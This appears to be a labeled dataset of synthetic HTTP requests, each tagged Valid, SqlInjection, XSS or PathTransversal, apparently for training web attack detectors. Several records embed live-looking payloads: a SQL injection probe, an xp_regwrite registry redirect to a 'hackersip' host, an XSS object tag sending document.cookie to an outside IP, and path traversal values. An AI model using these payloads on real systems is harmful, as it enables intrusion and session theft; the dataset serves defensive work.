Accept-Charset: x-mac-turkish;q=0.3, iso-8859-9
Accept-Encoding: identity;q=0.6, compress;q=0.1, identity;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 211.175.152.169
Cookie: w81n=ohuo;zK7lsopen5plikeGW=nmmanano
Cookie2: $Version="008"
Date: Fri, 16 Nov 07 19:07:01 GMT
ETag: W/"NZxbFVmdZTGr7PoD63-"
Expect: ncAe=p7naltx;6z6ac=dnSam2
From: bkly@gN1itutinI.de
If-Modified-Since: Tue, 09 Sep 08 07:56:56 UTC
If-Unmodified-Since: Mon, 02 Feb 09 02:34:59 UTC
If-Match: "u-V6uB1mbq@@.Td0wj"
If-None-Match: *
If-Range: "wme5B43QYs31S0-"
Max-Forwards: 031
MIME-Version: 3.6
Pragma: nbotuitk=vu4ey
Proxy-Authorization: Basic TjVob3YybjphdHRpYmRhbw==
Authorization: weeioc rtmr=thTt
Range: 955815-429,91164-5504
Referer: /gsclssib/d0tr/tirzira.php
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.3 (Windows; U; Windows NT 9.2; hn-hu; rv:7.8.2) Gecko/21204238
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: HTTP/4.3 27.245.83.77, HTTP/1.1 211.40.93.29
Transfer-Encoding: edSt; aeAsm1=ysgnEw
Upgrade: pcVooi/8.0, teny6/2.3
Warning: 734 www.ernreSI.shtml "fig7ndengta3" 
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 507009022926065
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18071
Start - Id: 41357
class: SqlInjection
PUT /evnkg1cG8DqRivz6r/nqlTJO@-8/tuasTrtsicaf.js? HTTP/1.1
Content-Length: 104
Content-Language: 9uwooi,gs6ae
Content-Encoding: gzip
Content-Location: http://iIe0.cz/rtdlemaH/ayoee/eei3a/z7see6.js
Content-MD5: QTlzcm9sbmRsYWVpd2FTbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Feb 07 05:51:30 CET
Last-Modified: Wed, 30 May 07 08:33:33 CET
Host: 172.115.137.104
Connection: 2I4878ra
Accept: audio/basic, application/x-tar
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 155.207.248.242
Date: Tue, 17 Jul 07 19:04:20 GMT
Expect: is7uta
Max-Forwards: 0
Authorization: NTLM c2x0b2xlcmVpbm9zcm5uZmFwdGRxcmFhaWFMcVhldDlkc2FjZGI=
Referer: /snseo8te/gnceTsE.php
TE: trailers
User-Agent: a8rwUne/4.3.7.7.9
Via: 2.7 15.185.140.190:00, HTTP/6.6 80.1.206.76:509
Upgrade: nhetgd/3.9
Warning: 314 www.lhye.html "Tife" 
X-Serial-Number: 309660

V2MN-_z=ids&qBFjadivR_m@=4177&8s=p6wh&orloo=6&gn='   group    by    users.id    having     4448=4448

End - Id: 41357
Start - Id: 1116
class: Valid
GET /sRnyaehaga7d4rr/appV35hfS/e_a92cMREBZ/pcw.js? HTTP/1.0
Host: www.4oag.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: aa='Tose0ET'
Client-ip: 179.209.57.142
Cookie: NlogF.O0dRc=vENnTiNe0isdsf5
Cookie2: $Version="65"
Date: Mon, 04 Apr 05 19:09:19 GMT
ETag: "b5LmK1iJgh9xKKTJd4a"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Fri, 05 Sep 08 04:09:49 CET
If-Unmodified-Since: Sun, 10 Dec 06 09:24:16 UTC
If-Match: *
If-None-Match: "LkBZmiqOn-p@.LbHDR"
If-Range: "UpP23YI70kJfJZj20lMc"
Max-Forwards: 20
MIME-Version: 9.9
Pragma: t19mct='Htapp7'
Proxy-Authorization: 1roecw ynJns=ailepj5
Authorization: Basic aHNlZ2dyYTplOWViZQ==
Range: 634551-,48052-6687,-9
Referer: http://attn.fr/lfsGewE/arBADitc/iiuynl/uataagai/vHysnrti.jsp
TE: deflate
Trailer: Connection
User-Agent: esDcsea/0.4.5.8
UA-CPU: 68000
UA-Disp: 2076,5123,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8837x3320
Via: 7.2 www.pkfhuexe.gif, luci/8.4 www.aYme2s.jpg:7479, 7.9 60.2.158.177
Transfer-Encoding: identity
Upgrade: nwt/2.1, 9Anoe/4.1, tte/7.6, oIr/1.1, 0rasra/0.1
Warning: 737 144.157.19.107 "tuN5hTIzo9baaeA" 
X-Forwarded-For: 194.217.109.144
X-Serial-Number: 704934
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 1116
Start - Id: 2217
class: Valid
GET /euesvRSc8-lMD7FFcj8./isLhh/vSdju9@xC/r9olstezkdks/ooCieeBanpSe/mvCbWln0N_z9xk9/cdesiihptc/tdnxxOuvilPbeYd/rILEg0.shtml?5HdP=T4e HTTP/1.0
Host: 168.103.131.211
Connection: hoLr3si
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: dgAtu-tdPw8kna, Mlrteu5t-uan;q=0.9
Cache-Control: max-stale=52982
Client-ip: 104.107.235.127
Cookie: igtep=rbzei e;tajh=94219;9pedt8nhbhgk=124;fgmaar8ain=lzu1vAov9my;ithiaj=53
Cookie2: $Version="073"
Date: Fri, 05 Dec 08 20:02:40 GMT
ETag: "A_nl49yV5QH6IaVDMgCZ"
Expect: a3elr
From: tb0ptsP4@sadr.be
If-Modified-Since: Tue, 17 Nov 09 21:46:47 CET
If-Unmodified-Since: Sun, 21 Mar 04 07:40:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Sep 05 18:45:50 GMT
Max-Forwards: 8
MIME-Version: 4.8
Pragma: eusnda3h='o'
Proxy-Authorization: Digest qop=tSvsisht
Authorization: Digest cnonce="eTvt"
Range: -9799,98225-
Referer: /iaqi/b7when2z/fwmyrg/dcilem.asp
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 5.5; or-cp; rv:3.9.9) Gecko/06449919
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 504x1598
Via: 8.8 240.81.7.79:825, 4.8 www.ocilrpf.jpeg
Transfer-Encoding: identity
Upgrade: yEnTa/2.2, edNa/0.7
Warning: 810 www.morweae.jpg "sa4qrwUneheea7hlfh" 
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 92243859196
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 2217
Start - Id: 19524
class: Valid
GET /O6Dm1/da/salnif.bin? HTTP/1.0
Host: 48.37.37.127
Connection: close
Accept: text/*;q=0.2, application/postscript, text/plain;q=0.4
Accept-Charset: gb2312;q=0.4, windows-1255;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 150.105.58.192
Cookie: lyhcnsezel3f=r%i;rCfee=3108202
Cookie2: $Version="977"
Date: Wed, 23 Apr 08 20:01:36 UTC
ETag: "MW0fkk-l6LdM@-u@m"
Expect: itetett
From: uvksevoi@am3seosru.ch
If-Modified-Since: Fri, 01 Oct 04 13:25:36 UTC
If-Unmodified-Since: Sat, 13 Oct 07 17:18:52 UTC
If-Match: *
If-None-Match: "BbmY@1w@_KgFqB8uW6"
If-Range: Sat, 18 Apr 09 17:14:18 CET
Max-Forwards: 8
MIME-Version: 8.6
Pragma: rTo='4r'
Proxy-Authorization: Basic bnAzaTBkOm9yU1V2c1N0
Authorization: NTLM c3Nyd3dTRFRvcG05Y28xcG90b3RseGhsbG9vZ29lZGNlZWlIdWltOXI5
Range: -470982,-47168,1897-
Referer: http://c2wteniz.org/mThre/Aort/Fhdeirc/2eIirnnr/trtrb.doc
TE: trailers,gzip
Trailer: Date
User-Agent: j5tIrztly4Onmn
UA-CPU: PowerPC
UA-Disp: 4215,3072,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6360x084
Via: FTP/4.4 253.2.6.194
Transfer-Encoding: compress
Upgrade: ath/3.5, ct8ck/1.4, ijeoul/7.8, ean9p/4.9
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 47.134.24.152
X-Serial-Number: 910419107013273
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19524
Start - Id: 33960
class: Valid
POST /xEk3heowhrecueo6pe/5ZfRni/svogOEkeLAtaabe.cfm? HTTP/1.0
Content-Length: 180
Content-Language: s,mialuwO
Content-Encoding: compress
Content-Location: http://www.fenso.uk/oiiBnw/apea/idb0/b15s9l7.tiff
Content-MD5: d2FwY09lZU5iaU5SaW5pbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Jan 06 23:47:44 UTC
Last-Modified: Mon, 23 Oct 06 11:49:37 CET
Host: www.us1lon8sjw.com
Connection: close
Accept: video/*;q=0.4, application/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: s7Etl-ha, u-y;q=0.3, oira-rlyEsf;q=0.4, pt2HNe-ul7msAe, 7t-h
Cache-Control: no-store
Client-ip: 231.32.90.245
Cookie: wa8edacoraj1=495521829;pfhaolbnwbtp=thbpccndsatr;hj=eMEgt;whetnteatSiar=8
Cookie2: $Version="64"
Date: Mon, 17 Mar 08 20:01:06 UTC
ETag: "z2-GAtrkDmrc@DF"
Expect: lnt19er6=elsin
From: aNdnhYs5@1KPmv1.it
If-Modified-Since: Mon, 12 Dec 05 07:43:12 CET
If-Unmodified-Since: Sun, 27 May 07 01:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 May 09 06:07:18 GMT
Max-Forwards: 55
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic YXRlczo4YmN0ZWVhYQ==
Authorization: NTLM ZWp1ZXN0VGlzZDBnY2V5MGVyZWN0bWFub2RpcnVydGNvbE9vZXNoaTNld2VP
Range: 50468-961,8583-3
Referer: /dwtdcn/6Ah0I/remBsmj5.jsp
TE: chunked;q=0.1,chunked
Trailer: Via
User-Agent: e2nrtsdclirI
UA-CPU: x86
UA-Disp: 225,357,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 236x087
Via: HTTP/7.2 www.eooqi7vl.css
Transfer-Encoding: compress
Upgrade: qieelu/3.4, EqncM/6.9, btrA/6.0, idP/4.3, Owse/7.1
Warning: 061 www.9xrudae.html "mnbi4ahRkasyblsevwp" 
X-Forwarded-For: 151.46.94.105
X-Serial-Number: 33226
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

8k8L=tn&7efSbt=241717&Ymksos=s5jztY2f&lefOteIann=o57dttsreplacetm&tite=+n pf&yApsFdvarQpklibL=h049hmol7aa6&t3lun=861&hzanhkuiaet2h=nye7gts8aet&Aoz8ROC8=673011030&aTnre=t2eroirar9

End - Id: 33960
Start - Id: 25657
class: Valid
GET /na.tiff?6Q6Y=793569&rerrG75pc7=iOf&o8NfpTA1EFQf=69394059&Nootnmiefzzama=1&Fma.=wcopya&ci4s=qQol4pQ6ixDx&OaatrrSpo=25012536 HTTP/1.0
Host: 74.97.83.193
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 163.112.170.136
Cookie: h0dpImrddh=|htacces8EpHoxtermd~ihmoj< ;tki4ai=70247656;oeaiEiR9uiasd=6193191;iabykvn='|kgi;.j0Z=wb
Cookie2: $Version="0"
Date: Wed, 19 Sep 07 05:13:54 UTC
ETag: "JpIsxO9C.2s@pCWOu21"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sun, 18 Jun 06 13:06:59 CET
If-Unmodified-Since: Mon, 27 Aug 07 22:29:13 GMT
If-Match: *
If-None-Match: "cgQxMe9KaOU3MrsDZW"
If-Range: Mon, 03 May 04 15:12:44 GMT
Max-Forwards: 27
MIME-Version: 6.2
Pragma: Ixjwtak=wlaLNA
Proxy-Authorization: Digest nonce
Authorization: Digest nc=cECD7cB1
Range: 0298-,9690-2,44-94
Referer: http://ssod.de/4nde/ecaoe/iarl/yggSu.wav
TE: trailers,gzip
Trailer: Range
User-Agent: hekZIc5gWO http://www.4iijaD4f.de
UA-CPU: Sparc
UA-Disp: 349,527,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: FTP/6.4 174.168.181.78, 1.8 68.43.123.245, 9.0 126.131.146.128:99666
Transfer-Encoding: gzip
Upgrade: oyo8/5.6
Warning: 768 71.160.96.112:815 "eemtw" "Sat, 22 Jan 05 09:40:57 GMT"
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25657
Start - Id: 18691
class: Valid
GET /fs/et8WPoJMXx0i8@.sh? HTTP/1.1
Host: 50.118.37.73
Connection: qwio3ft6
Accept: */*
Accept-Charset: cp-936;q=0.9, utf-7;q=0.0, windows-874, iso-10646-ucs-2;q=0.9, windows-1258
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 135.243.15.143
Cookie: ei=h2rh;hmg=sesy;ou3=4aso;0orGshne=teeN
Cookie2: $Version="46"
Date: Fri, 22 Jan 10 22:45:34 UTC
ETag: "Qq1wpLUjZ4zji6rUl6O"
Expect: ohrnAtc
From: r6tpmn@ahrsteeike.st
If-Modified-Since: Thu, 23 Sep 04 07:13:29 CET
If-Unmodified-Since: Sat, 09 Dec 06 07:44:05 UTC
If-Match: "f7dJxW-Ea4957ok"
If-None-Match: *
If-Range: *
Max-Forwards: 2081
MIME-Version: 4.4
Pragma: 0Gh1htFi='estf'
Proxy-Authorization: Basic dDFzcjphcGxtb2V0ZQ==
Authorization: enaes 8hf9b=6shEosry
Range: 8793-,319-418665,-980
Referer: /rsam/ogr8/tsqdg.jpeg
TE: chunked
Trailer: If-Match
User-Agent: qutn/4.3
UA-CPU: x86
UA-Disp: 4502,276,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8595x9488
Via: ddsa/7.0 www.lt6resgt.jpeg
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 538 220.84.138.187 "risamfaWl6rs" "Tue, 09 Mar 04 19:12:07 UTC"
X-Forwarded-For: 1.237.229.149
X-Serial-Number: 343586
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18691
Start - Id: 45976
class: PathTransversal
POST /llynbdkiLcuO5tmg/as4/t50IcBHXx/gk9WjY/enfbSCMJU0eQD9sK_l/IiQy/nxen/echovo.mXQzCCt5/PpYXBz1d/9O.xbetweencZT8P56m.exe? HTTP/1.0
Content-Length: 35
Content-Language: tonii9e
Content-Encoding: compress
Content-Location: http://www.eRhchz.biz/aaei.zip
Content-MD5: aHNpdWx6cmFvZVVtZW56YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Aug 08 22:54:00 GMT
Last-Modified: Wed, 01 Jul 09 11:12:23 GMT
Host: 3.233.80.93
Connection: close
Accept: audio/x-wav, text/*
Accept-Charset: *
Accept-Encoding: \autoexec.bat
Accept-Language: *
Cache-Control: max-stale=65
Client-ip: 151.169.171.65
Cookie: lnooeeo=05035
Cookie2: $Version="661"
Date: Tue, 31 May 05 13:01:10 UTC
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: rrenkaih
From: ubSynrd@jJdge.it
If-Modified-Since: Tue, 03 Nov 09 08:00:55 UTC
If-Unmodified-Since: Tue, 08 May 07 04:12:26 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 08 May 06 23:51:59 CET
Max-Forwards: 2
Pragma: o=im
Proxy-Authorization: Digest qop=furtk
Authorization: Basic b25leGtyOmZyaWU=
Range: 1614-89,75-
Referer: http://www.dieVe.biz/e9cmse/reyjl.gif
TE: deflate;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 1.6; nd-de; rv:8.3.2) Gecko/70103930
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 548x253
Via: 7.3 www.wyn7rDiM.shtml, 0.5 24.111.91.199:0, 0.3 249.132.118.50
Transfer-Encoding: gzip
Upgrade: fsoe/9.8, uwtd/5.6, pcsCta/5.2
Warning: 338 134.95.42.95 "lbocbuwzwise1Nry" 
X-Forwarded-For: 87.224.179.54
X-Serial-Number: 41893725708385200236
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

oovbdlgltteo=apassthrudats4\%te

End - Id: 45976
Start - Id: 46585
class: XSS
GET /ticrru/ctDonmD6FWW57WbsWy/ypret/not4th4cha.swf?rqeii=685862&nnfh=2569&afaqd2eie=yr7b&6aetstahsas=1H0bOh+uu+egpc&vD.BRF=O HTTP/1.1
Host: www.adCtfaeSi.uk
Connection: Tt5usn5
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, compress, compress, gzip;q=0.3
Accept-Language: <object classid   =   " clsid:...  "    codebase   =   "    javascript: [window.open('http://59.83.58.13/sive.mdb'+document.cookie);]  " >
Cache-Control: no-store
Client-ip: 115.82.181.163
Cookie: mfllds8d=usfot5;au9uo0o=B) n;ianng=sa;aDqX_bgsoundIlz=dsn
Cookie2: $Version="4"
Date: Wed, 17 Jan 07 12:15:56 UTC
ETag: W/"i_iTdQu4_UB@-BG"
Expect: 100-continue
From: t0epeeaC@htiute.ch
If-Modified-Since: Sun, 29 Nov 09 09:29:21 GMT
If-Unmodified-Since: Tue, 02 Jan 07 24:19:31 UTC
If-Match: *
If-None-Match: "ife@pSBAFKlG0xfGWPF"
If-Range: Thu, 23 Aug 07 17:00:25 UTC
Max-Forwards: 0377
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: pTnwR siFe=oigztm
Range: -680
Referer: http://www.oomt.cz/gtrxsx/s4nprim/tkorn/neazfj/irta.cgi
TE: gzip;q=0.2,gzip;q=0.1,gzip
Trailer: Expect
User-Agent: Mozilla/5.5 (X11; U; Linux i586 1.5; la-fe; rv:4.1.4) Gecko/65931469
UA-CPU: PowerPC
UA-Disp: 3779,9058,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 3.7 www.rte1bbrr.shtml, HTTP/3.5 www.2eic.jpeg
Transfer-Encoding: deflate
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 726 www.ytnR.png "llgcrlhuiap" "Sat, 22 Mar 08 16:22:53 GMT"
X-Forwarded-For: 55.134.78.120
X-Serial-Number: 34246962990912
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46585
Start - Id: 41173
class: SqlInjection
POST /lCKvrtU@2KnOo6SN71/v9I1htdeeUtimwSe/oauaai3hhtszu/samservicesdivshutdownSxinsertB/2t2keesRetame/2B/reqttrymvKrn/Utmitvoo1tsehtak/ced/mwk3gK/aps5b4u.js? HTTP/1.0
Content-Length: 51
Content-Language: e4r4wr,y
Content-Encoding: identity
Content-Location: http://nouE3oi.ch/betg.wmn
Content-MD5: ZWhobG9zZDBjcHhzeWlzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Jan 09 20:39:36 CET
Last-Modified: Fri, 22 Jun 07 21:11:33 GMT
Host: 194.37.10.25
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.6
Accept-Language: N-qm, qonR4um8-naseaNhr, g-liqn2r, ri-5w0, ebaro-r9ve7x
Cache-Control: no-transform
Client-ip: 107.169.40.46
Cookie: nTseseR=to?atsaActdel+cd agi;aln=dh1aEtueeErtYNmi;tHdSnoesinhyteA=exec     xp_regwrite     'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','ata1po','REG_SZ','DBMSSOCN,hackersip,80';tiireeowpotUts=mhtbinulUx;oionarsEi=16
Cookie2: $Version="399"
Date: Tue, 10 Jan 06 15:12:40 UTC
ETag: "nv8wFoFQcdrFI9H"
Expect: 100-continue
If-Modified-Since: Thu, 31 Aug 06 16:20:53 UTC
If-Unmodified-Since: Tue, 07 Jun 05 21:54:42 GMT
If-Match: *
If-None-Match: "zG-vtkRIlpQ.57Ffb-7A"
If-Range: *
Max-Forwards: 8
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="hm2q"
Authorization: NTLM NGF0dGw5aGs5dWVybDRpaXN0THB6SDkxaWFoaWV0dGRJaHRvY2hlYXRxYmVucGNt
Referer: /itpe.gif
TE: trailers
User-Agent: Mozilla/1.1 (X11; U; Unix 5.1; ns-sf; rv:8.1.8) Gecko/86980789
Via: FTP/6.5 www.Tgieme0l.jpeg, azoc9a/0.4 8.59.27.185:542
Transfer-Encoding: gzip
----: -------------------------
~~~~~: ~~~~~~~~~~~~

gpeznhw5j5=]nhu&window.openH3QZkF=Gv&5X3WZEvdx2=6

End - Id: 41173
Start - Id: 28249
class: Valid
GET /eem09feT/qZj9dCnw0.NHk/Fg/bxtermvdhodivls@.gif?i7Fcirm3d9l=190088&eRtcyne31joHDh=c&eoeyP2orc8=988&yKbNY=cssyvnilipyc9o&me=gjecywne0syoet&nNegW=2&XoehraSeiof=52064 HTTP/1.1
Host: 21.161.243.249
Connection: close
Accept: text/*, image/gif;q=0.6, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.2
Accept-Language: *;q=0.9
Cache-Control: max-age=2
Client-ip: 141.31.102.223
Cookie: 8LAck.cR=utd 1n;kdx4s2cc;tsNeon=e2FenwrwlhFeIlocationg
Cookie2: $Version="316"
Date: Mon, 29 Jun 09 07:17:32 CET
ETag: W/"h5RyVwb5Q-2_w1WV@d6F"
Expect: ibTp1t=svzsd
From: okoeas@anfr7lr.uk
If-Modified-Since: Sat, 21 Jan 06 15:36:02 CET
If-Unmodified-Since: Fri, 01 Jun 07 06:11:36 UTC
If-Match: *
If-None-Match: *
If-Range: "fNMZG7UoN8N0Ft-QaoNT"
Max-Forwards: 6811
MIME-Version: 8.6
Pragma: nHd='tiDeant'
Proxy-Authorization: NTLM cmVuaXltZWVscGVyY29lb2xhaHRzYWVtc3N1bnJ3Ym9hcmFpSWRhY28xc3E=
Authorization: NTLM c25pYWNuYnhpbnVmb2VwZ3lhbmVjcm1hbHpvZWI3ZXN5dGNudG56cQ==
Range: 29956-,-15205
Referer: http://S8eses.cz/4eaOmei/eedtA.dll
TE: trailers,deflate,chunked;q=0.1
Trailer: Host
User-Agent: Mozilla/6.3 (Machintosh; U; PPC 1.6; ht-nr; rv:8.5.8) Gecko/93428300
UA-CPU: PowerPC
UA-Disp: 957,7809,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 096x863
Via: 5.2 www.gnrup.gif, 2.4 www.oB8suldr.gif, 1.1 www.wBl1.htm
Transfer-Encoding: deflate
Upgrade: 0annoh/0.5, hzia/9.6
Warning: 334 0.64.248.123:76205 "otiprr" "Wed, 15 Aug 07 02:30:33 UTC"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 144317661774202
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28249
Start - Id: 45272
class: PathTransversal
GET /1lnIwhGeLhL3y2em/uP_bEeaDah3/wwQtXBj_/6pPqFD_/BobjectQdMHki/0J-BopocfN/rYzbMqGyGM/yQ5gQKH3.shtml?soi=aopfwieEhnekagetw HTTP/1.1
Host: www.e3hnxiUc4n.com:83
Connection: 1ant
Accept: */*
Accept-Charset: iso-8859-3, iso-8859-15;q=0.6, x-mac-chinesesimp, windows-1251;q=0.0, iso-8859-9;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 166.169.134.169
Cookie: roseaeh7aaan=veetOrp;aetnehueue=470200;awz=)rfP;landTjpLG=Phfiirgua8s
Cookie2: $Version="48"
Date: Fri, 11 Aug 06 15:26:15 CET
ETag: W/"GdPyX5kqoNwtgLKVl"
Expect: elrv
From: ra7rtweh@ttrsy.org
If-Modified-Since: Sat, 24 Apr 04 18:18:58 GMT
If-Unmodified-Since: Thu, 30 Dec 04 04:00:15 GMT
If-Match: "bBzfHYPro9Fw4_gcUf8"
If-None-Match: *
If-Range: Sat, 05 Jan 08 20:32:54 CET
Max-Forwards: 6091
MIME-Version: 1.0
Pragma: ibr='euo0yg'
Proxy-Authorization: Basic enRvTzphaXFu
Authorization: NTLM WWV0eW9zZWR5U2tFdGhzZWw5aWZ0Y3NzdThvaGFzbDF0cncwVmhldGE=
Range: 259-814,-6312
Referer: http://www.5osNsH.it/m2s6ac/hwsv/ytvsohmT/tc3aE28.tiff
TE: trailers,chunked,deflate;q=0.1
User-Agent: \WINNT\system.ini
UA-CPU: 68000
UA-Disp: 4571,953,16
UA-Pixels: 351x9114
Via: ef6n/9.5 www.d5cktrkn.html, 4.6 106.114.112.249
Transfer-Encoding: ebhIt3; siDelcnc=oXot
Upgrade: rY7u/3.8, gk6/3.2, o8xHs/4.5, eog/8.6
----: ------------------

null

End - Id: 45272
Start - Id: 8853
class: Valid
GET /htXeom/tKYzcpL.@UMSNIzRV6r3/4E3/kzss9mnh/oiaeahghdnej2/zJKbaqt@2Rt0ajSR/caDrDPUg1Ayo-N9fZT/mjGq.php3?oerdtemaulhsa=398&IWfCGVeKx5d=r0+c&sin4sAe=hgmetpasswdi%26pOt%40nodee+po&inn1ewdLlvl=4+s%3B&ecAde=m%5D%3Bservices7&v3uA3M3_RZ=ah2+evalj1liframeibvpiniamp4&h7mgy8bng=bpqok3qk9&CMH.lhkUen=gstvfv9&iayme6y=mhtpassidd&tm1S=om%5C7nfe%5Bnainsertxt+e&8kUeSR-1z=hhtpassles&Yo=up&htdnhulnfe14ep=vhe&ngneruix=rYp HTTP/1.1
Host: 67.39.15.117
Connection: msAsrnw
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: efuNAsda-t, mnbwcu-yaw
Cache-Control: no-transform
Client-ip: 252.175.148.100
Cookie: lirleyya1a=jntsb;rsna=xEt nae[T nwqa;KvncC-qs=839849;mo8ynte=yUnsohRnitieaeewo;yrS8nu7968z=asimseraRzpliaw3e;dn0dssxvh6=c;tmpt-
Cookie2: $Version="67"
Date: Sat, 07 Jan 06 06:56:15 GMT
ETag: W/"iQi3m4c9Ivfsr9BCO."
Expect: 100-continue
From: nnsIg@cmoeufg.uk
If-Modified-Since: Fri, 16 Nov 07 17:43:01 GMT
If-Unmodified-Since: Sat, 13 Sep 08 16:50:53 GMT
If-Match: *
If-None-Match: *
If-Range: "yrh.4q0812bsXRB"
Max-Forwards: 575
MIME-Version: 1.5
Pragma: uot0l=jprx
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest nonce
Range: 7-
Referer: /rr6nrh/uRntsusr/taeoapqa.mdb
TE: gzip;q=0.1
Trailer: Max-Forwards
User-Agent: Mozilla/4.9 (Windows; U; WinNT 0.0; nv-tw; rv:5.8.2) Gecko/73786463
UA-CPU: StrongARM
UA-Disp: 909,1237,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 186x0429
Via: FTP/5.9 22.185.17.144, HTTP/3.8 34.96.149.14
Transfer-Encoding: deflate
Upgrade: it9o/7.8, e4esfs/7.3, Csos/8.4
Warning: 091 www.bqal5R.jpg "tAj9t" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8853
Start - Id: 26332
class: Valid
GET /sxmtso/eauqhharstsb/pShmn7seehtr/gGveaXrpol.asmx?wp-SgzM=od&t3gewo3dAimb=d&nssew=Nol&5mZ.RVLh=r6y6w4t&vHFr3=172316&ca=%27httpsmsiBlinkth%25unpou&haoctbco=tFmrqmolelae7rkiTt&shutdownZNKFls6telnetom=6o&woryacav=iryuHecllklb&oQVG1R7autoexeclX.=llCU4yW HTTP/1.1
Host: 174.162.59.146:8
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.7
Accept-Language: a-sMi, r-m4QLrrq, dF-Ih7
Cache-Control: tr=a
Client-ip: 137.228.228.23
Cookie: l09e4hefb7=7302770;LdeK=blsrGR;Sodoidr=and;97BmochapLO@-T=hqe45rAxc/t
Cookie2: $Version="872"
Date: Sun, 18 Dec 05 22:26:51 CET
ETag: W/"xK5@VEQqljlqLT7."
Expect: 100-continue
From: teed6sis@nesteei.biz
If-Modified-Since: Sat, 22 May 04 07:01:09 UTC
If-Unmodified-Since: Fri, 29 Aug 08 17:07:47 GMT
If-Match: *
If-None-Match: "3rwRK9@0axq7jRXZ"
If-Range: Wed, 28 Jun 06 03:01:03 CET
Max-Forwards: 7
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Digest cnonce="nalwo"
Range: -954,195324-0
Referer: http://www.nnoar2n.cz/aeqwhe9R.aspx
TE: chunked;q=0.2,chunked;q=0.3
Trailer: Pragma
User-Agent: toasnpelh/6.1.9.1.0
UA-CPU: StrongARM
UA-Disp: 417,8223,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 917x537
